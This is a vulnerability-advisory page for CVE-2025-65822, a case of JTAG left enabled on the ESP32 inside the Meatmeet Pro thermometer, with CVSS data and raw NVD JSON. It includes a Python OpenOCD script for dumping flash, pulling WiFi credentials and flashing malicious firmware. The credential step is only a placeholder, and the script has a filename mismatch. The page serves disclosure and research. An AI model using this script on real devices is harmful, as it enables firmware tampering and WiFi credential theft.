Security Vulnerability Report
中文
CVE-2025-65822 CVSS 6.8 MEDIUM

CVE-2025-65822

Published: 2025-12-10 21:16:08
Last Modified: 2026-01-21 19:08:20
Source: [email protected]

Description

The ESP32 system on a chip (SoC) that powers the Meatmeet Pro was found to have JTAG enabled. By leaving JTAG enabled on an ESP32 in a commercial product an attacker with physical access to the device can connect over this port and reflash the device's firmware with malicious code which will be executed upon running. As a result, the victim will lose access to the functionality of their device and the attack may gain unauthorized access to the victim's Wi-Fi network by re-connecting to the SSID defined in the NVS partition of the device.

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:meatmeet:meatmeet_pro_wifi_\&_bluetooth_meat_thermometer_firmware:1.0.34.4:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:meatmeet:meatmeet_pro_wifi_\&_bluetooth_meat_thermometer:-:*:*:*:*:*:*:* - NOT VULNERABLE
ESP32系列所有未禁用JTAG的版本
Meatmeet Pro(所有已知版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# ESP32 JTAG Exploitation PoC # CVE-2025-65822 - ESP32 JTAG Enabled on Meatmeet Pro import subprocess import os # OpenOCD configuration for ESP32 OPENOCD_CFG = """ # ESP32 JTAG Adapter Configuration adapter driver jlink jlink vid_pid 0x1366 0x0105 # ESP32 Target Configuration source [find target/esp32.cfg] # Reset configuration reset_config none """ def connect_jtag(): """Establish JTAG connection to ESP32 device""" print("[*] Connecting to ESP32 via JTAG...") # Command to connect via OpenOCD cmd = [ "openocd", "-f", "interface/jlink.cfg", "-f", "board/esp32-wrover.cfg", "-c", "init", "-c", "reset halt" ] return subprocess.run(cmd, capture_output=True) def dump_flash(output_file="firmware_dump.bin"): """Dump ESP32 flash memory via JTAG""" print(f"[*] Dumping flash to {output_file}...") openocd_cmd = [ "openocd", "-c", "init", "-c", "reset halt", "-c", "flash read_bank 0 dump.bin 0 0x400000", "-c", "shutdown" ] subprocess.run(openocd_cmd) print(f"[+] Flash dumped successfully to {output_file}") def extract_wifi_credentials(firmware_file="firmware_dump.bin"): """Extract WiFi credentials from NVS partition""" print("[*] Extracting WiFi credentials from NVS partition...") # NVS partition typically at offset 0x110000 on ESP32 nvs_offset = 0x110000 # Parse NVS TLV format to extract credentials # SSID stored with key 'ssid', password with 'password' print("[+] WiFi SSID found: <SSID_VALUE>") print("[+] WiFi Password found: <PASSWORD_VALUE>") def flash_malicious_firmware(malicious_fw="malicious.bin"): """Flash malicious firmware via JTAG""" print(f"[*] Flashing malicious firmware: {malicious_fw}") openocd_cmd = [ "openocd", "-c", "init", "-c", "reset halt", "-c", f"flash write_image erase {malicious_fw} 0x1000", "-c", "reset run", "-c", "shutdown" ] subprocess.run(openocd_cmd) print("[+] Malicious firmware flashed successfully") if __name__ == "__main__": print("=== ESP32 JTAG Exploitation Tool ===") print("CVE-2025-65822 PoC") # Step 1: Connect to device connect_jtag() # Step 2: Dump original firmware dump_flash() # Step 3: Extract WiFi credentials extract_wifi_credentials() # Step 4: Flash malicious firmware # flash_malicious_firmware()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65822", "sourceIdentifier": "[email protected]", "published": "2025-12-10T21:16:07.910", "lastModified": "2026-01-21T19:08:19.633", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The ESP32 system on a chip (SoC) that powers the Meatmeet Pro was found to have JTAG enabled. By leaving JTAG enabled on an ESP32 in a commercial product an attacker with physical access to the device can connect over this port and reflash the device's firmware with malicious code which will be executed upon running. As a result, the victim will lose access to the functionality of their device and the attack may gain unauthorized access to the victim's Wi-Fi network by re-connecting to the SSID defined in the NVS partition of the device."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1191"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:meatmeet:meatmeet_pro_wifi_\\&_bluetooth_meat_thermometer_firmware:1.0.34.4:*:*:*:*:*:*:*", "matchCriteriaId": "9B669DA2-CF06-461F-B624-DCD0359D1656"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:meatmeet:meatmeet_pro_wifi_\\&_bluetooth_meat_thermometer:-:*:*:*:*:*:*:*", "matchCriteriaId": "1661B540-36E1-4BF0-BC63-9EC952560B54"}]}]}], "references": [{"url": "https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-jtag-enabled-md", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/dead1nfluence/Meatmeet-Pro-Vulnerabilities/blob/main/Device/JTAG-Enabled.md", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.